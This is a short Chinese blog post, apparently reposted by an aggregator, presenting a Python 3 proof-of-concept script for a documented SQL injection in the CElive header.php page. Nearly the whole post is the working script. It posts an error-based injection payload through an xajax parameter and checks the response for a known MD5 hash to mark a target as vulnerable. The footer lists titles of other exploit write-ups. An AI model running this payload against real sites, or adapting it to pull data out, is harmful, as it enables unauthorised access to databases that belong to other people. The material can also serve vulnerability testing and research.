二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、"/>

Python3实现PoC——wooyun-2014-070827(SQL注入)

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Python3实现PoC——wooyun-2014-070827(SQL注入)相关的知识,希望对你有一定的参考价值。

一、演示一下的利用效果

技术分享


二、漏洞说明

这次的PoC是验证SQL注入,漏洞详情


三、代码+注释

import requests
import argparse

parser = argparse.ArgumentParser()
parser.add_argument(‘-u‘, dest="url")
args = parser.parse_args()
url = args.url

# 存在漏洞的页面
url += "/celive/live/header.php"
# 构造payload,用md5结果来验证
payload = {
    ‘xajax‘: ‘LiveMessage‘,
    ‘xajaxargs[0][name]‘: "1‘,(SELECT 1 FROM (select count(*),"
                          "concat(floor(rand(0)*2),(select md5(888)))a"
                          " from information_schema.tables group by a)b)"
                          ",‘‘,‘‘,‘‘,‘1‘,‘127.0.0.1‘,‘2‘) #"
}

try:
    r = requests.post(url, data=payload)
    if(r.status_code == requests.codes.ok):
        if "0a113ef6b61820daa5611c870ed8d5ee" in r.text:
            print("{} is SQL_vul".format(url))
        else:
            print("{} is not SQL_vul".format(url))
except Exception as e:
    print(str(e))


本文出自 “李春光的技术博客” 博客,请务必保留此出处http://lichunguang.blog.51cto.com/10274243/1883810

以上是关于Python3实现PoC——wooyun-2014-070827(SQL注入)的主要内容,如果未能解决你的问题,请参考以下文章

基于Python3的漏洞检测工具 ( Python3 插件式框架 )

编写Poc:Yapi远程命令执行漏洞

Discuz! 7.x 反射型xss

3.1.1 zabbix(上)

PHPCMS v9.5.6 通杀getshell(前台)

Discuz! 6.x/7.x 全局变量防御绕过导致命令执行